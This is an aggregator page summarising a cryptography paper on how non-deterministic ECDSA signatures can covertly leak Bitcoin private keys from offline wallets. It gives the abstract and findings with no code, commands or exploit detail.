How Perfect Offline Wallets Can Still Leak Bitcoin Private Keys
Stephan Verb\"ucheln
TL;DR
This paper demonstrates how non-deterministic ECDSA signatures can be exploited to leak Bitcoin private keys, highlighting vulnerabilities even in offline wallets without side channels.
Contribution
It reveals a novel attack exploiting ECDSA's non-determinism to leak private keys in Bitcoin, extending previous cryptanalysis to modern cryptocurrency protocols.
Findings
ECDSA's non-determinism can leak private keys
Offline wallets are vulnerable to this attack
Implications for Bitcoin security
Abstract
ECDSA has become a popular choice as lightweight alternative to RSA and classic DL based signature algorithms in recent years. As standardized, the signature produced by ECDSA for a pair of a message and a key is not deterministic. This work shows how this non-deterministic choice can be exploited by an attacker to leak private information through the signature without any side channels, an attack first discovered by Young and Yung for classic DL-based cryptosystems in 1997, and how this attack affects the application of ECDSA in the Bitcoin protocol.
Peer Reviews
No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.
Videos
No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.
Taxonomy
TopicsCryptography and Data Security · Cryptography and Residue Arithmetic · Chaos-based Image/Signal Encryption